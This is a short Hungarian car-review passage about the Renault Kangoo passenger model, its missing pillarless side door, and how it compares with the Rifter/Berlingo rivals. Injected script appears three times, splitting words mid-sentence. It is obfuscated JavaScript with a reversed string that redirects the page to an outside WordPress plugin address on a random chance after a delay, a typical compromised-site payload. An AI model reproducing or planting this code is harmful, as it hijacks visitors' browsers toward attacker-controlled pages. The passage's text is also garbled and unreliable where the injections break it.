Tudjuk le rögtön az elején: úgy tűnik, a szezámajtó, azaz a B-oszlop nélkül összezáró utasoldali fülkeajtó és oldalsó toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolóajtó nem lesz elérhető a Renault Kangoo kombihoz, legalábbis egyelőre biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan nem. A hatalmas rakodónyílást eredményező megoldás csak a furgonhoz kapható, de a Kangoo így is praktikus részletekkel igyekszik behozni hátrányát a nála két évvel korábban megújult Peugeot Rifter / Citroën Berlingo / Opel Combo / Toyota Proace City klánnal szemben. Papíron hátrány velük szemben, hogy sem harmadik üléssor, sem hosszabb karosszéria nem szerepel egyelőre a kínálatban – később persze megjelenhetnek ezek, ahogy az eddigi Renault Kangoo-kból is létezett nyújtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott (sőt, rövidített) verzió is….
- Hirdetés -